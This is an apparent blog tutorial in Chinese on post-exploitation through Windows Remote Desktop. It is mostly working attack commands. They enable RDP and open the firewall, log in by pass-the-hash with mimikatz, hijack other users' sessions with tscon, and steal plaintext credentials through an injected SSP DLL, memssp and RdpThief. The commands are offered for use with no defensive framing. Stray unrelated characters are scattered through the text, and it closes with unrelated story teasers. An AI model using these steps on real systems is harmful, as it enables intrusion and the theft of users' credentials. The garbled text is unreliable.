后滲透-Windows遠(yuǎn)程桌面

查看是否開啟遠(yuǎn)程桌面

0x1表示關(guān)閉伐谈;0x0表示開啟

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
image.png

查看遠(yuǎn)程桌面的端口號

得到的結(jié)果為16進(jìn)制格式

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
image.png

開啟/關(guān)閉遠(yuǎn)程桌面

  • 開啟
meterpreter > run post/windows/manage/enable_rdp 
image.png
  • 關(guān)閉
meterpreter > run multi_console_command -r /root/.msf4/loot/20191203031341_default_192.168.80.132_host.windows.cle_476697.txt
image.png

修改防火墻允許3389端口通過

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
image.png

開啟多用戶登錄

1.mimikatz支持安裝補(bǔ)丁實現(xiàn)多用戶登錄驾讲,但是重啟后會失效

  • 使用與原系統(tǒng)相同的賬戶,原系統(tǒng)還是會被切換到登錄界面
  • 使用與原系統(tǒng)不同的賬戶燕侠,可成功登錄
privilege::debug
ts::multirdp
image.png

2.安裝rdpwrap實現(xiàn)多用戶登錄
地址:https://github.com/stascorp/rdpwrap

install.bat 安裝
uninstall.bat 卸載
image.png

使用hash登錄windows遠(yuǎn)程桌面

適用于Windows 10和Server 2012系統(tǒng)畏腕;Windows 7和Server 2008默認(rèn)不支持乘凸,需要安裝2871997鸥拧、2973351補(bǔ)丁党远。

mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:192.168.80.246 /ntlm:32ed87bdb5fdc5e9cba88547376818d4 "/run:mstsc.exe /restrictedadmin"
image.png

如果登錄時有如下提示,可通過修改注冊表解決

image.png
beacon> shell REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

利用tscon登錄任意用戶的遠(yuǎn)程桌面

  • 比如我們獲得了一臺administrator權(quán)限的服務(wù)器
image.png
  • 首先使用psexec獲得system權(quán)限
psexec64.exe -i -s cmd.exe
image.png
  • 接下來查看當(dāng)前有哪些用戶在線
query user
image.png
  • 最后切換到會話2的遠(yuǎn)程桌面
tscon 2
image.png

獲取遠(yuǎn)程桌面的歷史記錄以及保存的賬號密碼

meterpreter > run post/windows/gather/enum_termserv 
image.png
https://www.nirsoft.net/utils/network_password_recovery.html
image.png

ssp密碼記錄

記錄rdp登入到當(dāng)前系統(tǒng)時富弦,輸入的明文賬號密碼沟娱。

方法一:需要重啟才能生效

自定義一個dll,例如mimikatz中的mimilib.dll腕柜,在系統(tǒng)啟動時济似,加載到lsass.exe進(jìn)程中

  • 首先將mimilib.dll復(fù)制到c:\windows\system32目錄下
copy mimilib.dll c:\windows\system32
  • 然后添加mimilib.dll到注冊表
reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\ /v "Security Packages"

reg add HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\ /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f
  • 有人登錄時,密碼會保存在C:\Windows\System32\kiwissp.log
image.png

方法二:利用mimikatz進(jìn)程注入媳握,無需重啟即可生效碱屁,但重啟后會失效

mimikatz privilege::debug
mimikatz misc::memssp
type C:\Windows\System32\mimilsa.log 

RdpThief

記錄在當(dāng)前系統(tǒng)rdp登出時,輸入的明文賬號密碼蛾找。
https://github.com/0x09AL/RdpThief.git

beacon> rdpthief_enable
beacon> rdpthief_dump
beacon> rdpthief_disable
image.png

參考:

https://laucyun.com/17f97e47b62717fb9b36750723aa861d.html
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Pass-the-Hash-with-Remote-Desktop/
https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E4%BB%8E%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E5%AE%A2%E6%88%B7%E7%AB%AF%E6%8F%90%E5%8F%96%E6%98%8E%E6%96%87%E5%87%AD%E6%8D%AE/
https://www.cnblogs.com/zpchcbd/p/11865633.html

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市赵誓,隨后出現(xiàn)的幾起案子打毛,更是在濱河造成了極大的恐慌,老刑警劉巖俩功,帶你破解...
    沈念sama閱讀 206,214評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件幻枉,死亡現(xiàn)場離奇詭異,居然都是意外死亡诡蜓,警方通過查閱死者的電腦和手機(jī)熬甫,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,307評論 2 382
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來蔓罚,“玉大人椿肩,你說我怎么就攤上這事〔蛱福” “怎么了郑象?”我有些...
    開封第一講書人閱讀 152,543評論 0 341
  • 文/不壞的土叔 我叫張陵,是天一觀的道長茬末。 經(jīng)常有香客問我厂榛,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 55,221評論 1 279
  • 正文 為了忘掉前任击奶,我火速辦了婚禮辈双,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘柜砾。我一直安慰自己湃望,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 64,224評論 5 371
  • 文/花漫 我一把揭開白布局义。 她就那樣靜靜地躺著喜爷,像睡著了一般。 火紅的嫁衣襯著肌膚如雪萄唇。 梳的紋絲不亂的頭發(fā)上檩帐,一...
    開封第一講書人閱讀 49,007評論 1 284
  • 那天,我揣著相機(jī)與錄音另萤,去河邊找鬼湃密。 笑死,一個胖子當(dāng)著我的面吹牛四敞,可吹牛的內(nèi)容都是我干的泛源。 我是一名探鬼主播,決...
    沈念sama閱讀 38,313評論 3 399
  • 文/蒼蘭香墨 我猛地睜開眼忿危,長吁一口氣:“原來是場噩夢啊……” “哼达箍!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起铺厨,我...
    開封第一講書人閱讀 36,956評論 0 259
  • 序言:老撾萬榮一對情侶失蹤缎玫,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后解滓,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體赃磨,經(jīng)...
    沈念sama閱讀 43,441評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,925評論 2 323
  • 正文 我和宋清朗相戀三年洼裤,在試婚紗的時候發(fā)現(xiàn)自己被綠了邻辉。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,018評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡腮鞍,死狀恐怖值骇,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情缕减,我是刑警寧澤雷客,帶...
    沈念sama閱讀 33,685評論 4 322
  • 正文 年R本政府宣布,位于F島的核電站桥狡,受9級特大地震影響搅裙,放射性物質(zhì)發(fā)生泄漏皱卓。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 39,234評論 3 307
  • 文/蒙蒙 一部逮、第九天 我趴在偏房一處隱蔽的房頂上張望娜汁。 院中可真熱鬧,春花似錦兄朋、人聲如沸掐禁。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,240評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽傅事。三九已至,卻和暖如春峡扩,著一層夾襖步出監(jiān)牢的瞬間蹭越,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,464評論 1 261
  • 我被黑心中介騙來泰國打工教届, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留响鹃,地道東北人。 一個月前我還...
    沈念sama閱讀 45,467評論 2 352
  • 正文 我出身青樓案训,卻偏偏與公主長得像买置,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子强霎,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 42,762評論 2 345